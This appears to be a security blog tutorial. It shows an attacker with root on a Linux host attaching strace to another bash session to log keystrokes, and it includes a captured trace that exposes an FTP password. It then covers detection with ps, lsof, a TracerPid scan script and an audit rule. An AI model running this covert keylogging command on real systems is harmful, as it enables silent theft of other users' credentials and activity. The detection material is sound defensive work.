The strace tool is commonly used for debugging applications in Linux, tracing system calls and signals. Because it is more than likely already part of your OS, we will look at how an attacker can use a tool that is already there to his advantage.
Assumption: the attacker is already on the machine we are using.
For this example, we will perform the following:
1. Start strace and attach it to a specific PID
2. Capture all keystrokes from this PID and/or any child it forks (creates)
3. Store this information in a file for offline analysis
Let’s begin!
Let’s see what shells we currently have available
root@securitynik:~# ps aux | grep bash
root 3103 0.0 0.6 6140 3392 pts/0 Ss+ 17:14 0:00 bash
root 3199 0.0 0.6 6140 3540 pts/1 Ss 17:18 0:00 bash
root 3373 0.0 0.1 3488 768 pts/1 S+ 18:06 0:00 grep bash
Hmmm. Let’s see which one belongs to us
root@securitynik:~# tty
/dev/pts/1
Looks like we are currently using /dev/pts/1, so /dev/pts/0 (the bash with PID 3103) is the one we should hook into. Let's do that.
Let's start strace and send it to the background:
root@securitynik:~# strace -p 3103 -t -e write -q -f -o keylogger.txt &
[1] 3432
Above we are telling strace to do the following:
1. -p 3103: attach to PID 3103, which from the ps output above is the bash on pts/0
2. -t: prefix each line with the time of day
3. -e write: only trace write calls
4. -q: be quiet (suppress the attach/detach messages)
5. -f: follow any child process created by fork
6. -o keylogger.txt: write the results to a file named keylogger.txt
Using the console with PID 3103, let's run a few commands and connect to a remote system running FTP:
root@securitynik:~# id
uid=0(root) gid=0(root) groups=0(root)
root@securitynik:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
root@securitynik:~# ftp 192.168.0.50
Connected to 192.168.0.50.
220 Microsoft FTP Service
Name (192.168.0.50:root): administrator
331 Password required for administrator.
Password:
230-Welcome to securitynik FTP Server :-D
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> exit
221 Do return soon :-)
So the above commands were run, but what did we capture? Let's find out; the file has been truncated for brevity.
Note that the typed characters show up as single-byte writes to file descriptor 2 because bash's line editor (readline) echoes its input on stderr, while the output of the commands themselves appears as writes to descriptor 1 by the child PIDs that strace followed thanks to -f.
root@securitynik:~# cat keylogger.txt | more
-------- results from the ID command ---------
3103 18:20:51 write(2, "i", 1) = 1
3103 18:20:51 write(2, "d", 1) = 1
3103 18:20:52 write(2, "\n", 1) = 1
3449 18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39
-------- results from cat /etc/passwd ---------
3103 18:20:57 write(2, "c", 1) = 1
3103 18:20:57 write(2, "a", 1) = 1
3103 18:20:57 write(2, "t", 1) = 1
3103 18:20:57 write(2, " ", 1) = 1
3103 18:20:58 write(2, "/", 1) = 1
3103 18:20:58 write(2, "e", 1) = 1
3103 18:20:58 write(2, "t", 1) = 1
...
3103 18:20:59 write(3, "/etc", 4) = 4
3103 18:20:59 write(3, "\n", 1) = 1
3103 18:20:59 write(2, "c/", 2) = 2
3103 18:21:01 write(2, "p", 1) = 1
3103 18:21:01 write(2, "a", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "w", 1) = 1
3103 18:21:02 write(2, "d", 1) = 1
3103 18:21:02 write(2, "\n", 1) = 1
3468 18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2279) = 2279
-------- and last but not least the results from the FTP session ---------
103 18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103 18:21:17 write(2, "f", 1) = 1
3103 18:21:18 write(2, "t", 1) = 1
3103 18:21:18 write(2, "p", 1) = 1
...
3103 18:21:24 write(2, "1", 1) = 1
3103 18:21:24 write(2, "9", 1) = 1
3103 18:21:24 write(2, "2", 1) = 1
3103 18:21:24 write(2, ".", 1) = 1
3103 18:21:25 write(2, "1", 1) = 1
3103 18:21:25 write(2, "6", 1) = 1
3103 18:21:25 write(2, "8", 1) = 1
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "0", 1) =
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "5", 1) = 1
3103 18:21:26 write(2, "0", 1) = 1
3103 18:21:27 write(2, "\n", 1) = 1
3470 18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470 18:21:27 write(1, "220 Microsoft FTP Service\n", 26) = 26
3470 18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26
3470 18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470 18:21:31 write(1, "331 Password required for admini"..., 41) = 41
3470 18:21:31 write(6, "Password:", 9) = 9
3470 18:21:35 write(6, "\n", 1) = 1
3470 18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470 18:21:35 write(1, "230-Welcome to securitynik FTP S"..., 42) = 42
3470 18:21:35 write(1, "230 User administrator logged in"..., 34) = 34
3470 18:21:35 write(5, "SYST\r\n", 6) = 6
3470 18:21:35 write(1, "Remote system type is Windows_NT"..., 34) = 34
3470 18:21:35 write(1, "ftp> ", 5) = 5
3470 18:21:38 write(1, "d", 1) = 1
3470 18:21:39 write(1, "i", 1) = 1
3470 18:21:39 write(1, "r", 1) = 1
3470 18:21:39 write(1, "\n", 1) = 1
3470 18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470 18:21:39 write(1, "200 PORT command successful.\n", 29) = 29
3470 18:21:39 write(5, "LIST\r\n", 6) = 6
3470 18:21:39 write(1, "150 Opening ASCII mode data conn"..., 52) = 52
3470 18:21:39 write(1, "226 Transfer complete.\n", 23) = 23
3470 18:21:39 write(1, "ftp> ", 5) = 5
3470 18:21:43 write(1, "e", 1) = 1
3470 18:21:43 write(1, "x", 1) = 1
3470 18:21:44 write(1, "i", 1) = 1
3470 18:21:44 write(1, "t", 1) = 1
3470 18:21:44 write(1, "\n", 1) = 1
3470 18:21:44 write(5, "QUIT\r\n", 6) = 6
3470 18:21:44 write(1, "221 Do return soon :-) \n", 24) = 24
3103 18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
3103 18:21:44 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
As can be seen, the tools on our systems can be used for bad just as easily as they can for good.
How to mitigate this?
Be aware of what processes you expect to see on your systems. If you don't use strace for debugging and see it in your "ps aux" output, then you may need to investigate why it is there.
root@securitynik:~# ps aux | grep strace
root 3432 0.0 0.1 2088 644 pts/1 S 18:15 0:00 strace -p 3103 -t -e write -q -f -o keylogger.txt
Further checks:
root@securitynik:~# lsof | grep strace
strace 3432 root cwd DIR 8,1 4096 785892 /root
strace 3432 root rtd DIR 8,1 4096 2 /
strace 3432 root txt REG 8,1 207880 785911 /usr/bin/strace
strace 3432 root mem REG 8,1 1441960 655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace 3432 root mem REG 8,1 117960 679406 /lib/i386-linux-gnu/ld-2.13.so
strace 3432 root 0u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 1u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 2u CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 3w REG 8,1 4782 800789 /root/keylogger.txt
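The ps and lsof checks above find the tracer only when it is still called strace. A check that does not depend on the binary's name is to ask the kernel who is attached: strace -p works through ptrace, and any ptrace-attached process reports its tracer in the TracerPid field of /proc/<pid>/status. The script below is an added example (not part of the original post) that walks /proc and reports every traced process together with the tracer's command line; the status text used in the comments is constructed to match the scenario above.

```shell
#!/bin/sh
# Added example: find ptrace-attached processes via /proc/<pid>/status.
# In the scenario above, /proc/3103/status would contain a line such as
# "TracerPid:  3432" (constructed from the page's PIDs) while strace is attached.

# Read one /proc/<pid>/status document from stdin and print its TracerPid
# (0 when the field is absent, as on very old kernels).
tracer_pid_from_status() {
    awk '/^TracerPid:/ { print $2; found = 1 } END { if (!found) print 0 }'
}

# Print "<tracee pid> <tracer pid> <tracer command line>" for every traced
# process. Reading other users' /proc entries generally needs root.
find_traced_processes() {
    for status in /proc/[0-9]*/status; do
        [ -r "$status" ] || continue
        pid=${status#/proc/}
        pid=${pid%/status}
        # A process may exit between the glob and the read; treat that as untraced.
        tracer=$(tracer_pid_from_status < "$status" 2>/dev/null || echo 0)
        [ "$tracer" != 0 ] || continue
        # cmdline is NUL-separated; turn it into one readable line.
        cmd=$(tr '\0' ' ' < "/proc/$tracer/cmdline" 2>/dev/null || true)
        echo "$pid $tracer ${cmd:-<unknown>}"
    done
}

# Run as a script: list everything currently being traced on this host.
find_traced_processes
```

Run it as root on a schedule or from your monitoring agent and alert on any line where the tracer is not a debugger you expect. Because the check keys on the kernel's own bookkeeping rather than on a process name, a copy of strace renamed to something innocuous is still reported. For longer-term visibility, the ptrace system call itself can also be logged with an audit rule such as auditctl -a always,exit -F arch=b64 -S ptrace -k ptrace_attach.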